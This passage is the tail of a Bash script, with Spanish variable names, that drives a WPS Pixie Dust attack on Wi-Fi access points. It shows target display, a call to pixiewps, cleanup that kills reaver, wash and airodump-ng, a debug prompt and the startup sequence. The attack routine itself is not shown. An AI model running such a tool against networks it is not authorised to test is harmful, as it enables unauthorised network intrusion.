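        "$AMARILLO" "$COL_RESET" "$VERDE" "$mac_a_atacar" "$COL_RESET"
      printf '%bESSID : %b %b %s%b\n' \
        "$AMARILLO" "$COL_RESET" "$VERDE" "$nombre" "$COL_RESET"
      echo ""
      lanzar_pixiewps
      echo ""
    }

    ####################################################################
    ####################################################################

    # Remove session logs, stop helper tools and monitor interfaces, restart
    # NetworkManager if this script stopped it, then exit.
    limpiar() {
      echo ""
      # ":?" aborts instead of expanding to "/*" if the variable were empty.
      rm -f -- "${CARPETA_LOGS:?}"* &> /dev/null
      killall reaver_pixie &> /dev/null
      killall airodump-ng &> /dev/null
      killall wash &> /dev/null
      killall pixie &> /dev/null
      desactivar_todos_monX
      if [[ "${HEMOS_MATADO_PROCESOS:-NO}" == "SI" ]]; then
        clear
        echo -e "${AMARILLO}Throwing ended put the card into monitor mode processes${COL_RESET}"
        /etc/rc.d/rc.networkmanager start
      fi
      exit 0
    }

    # Ask whether to enable debug output; sets DEBUG to SI or NO.
    modo_debug() {
      local MODO
      while :; do
        clear
        echo
        echo
        echo -e "${AMARILLO}PIXIE SCRIPT $VERSION FOR 5.1${COL_RESET}"
        echo
        echo -en "${ROJO}WANT TO ACTIVATE DEBUG MODE (S/N)${COL_RESET}"
        read -r MODO || limpiar
        case "$MODO" in
          s | S) DEBUG="SI"; return ;;
          n | N) DEBUG="NO"; return ;;
        esac
      done
    }

    trap limpiar SIGHUP SIGINT
    # Make sure the working directories exist, then start from empty logs.
    mkdir -p -- "$CARPETA_LOGS" "$CARPETA_KEYS"
    rm -f -- "${CARPETA_LOGS:?}"* &> /dev/null
    modo_debug
    menu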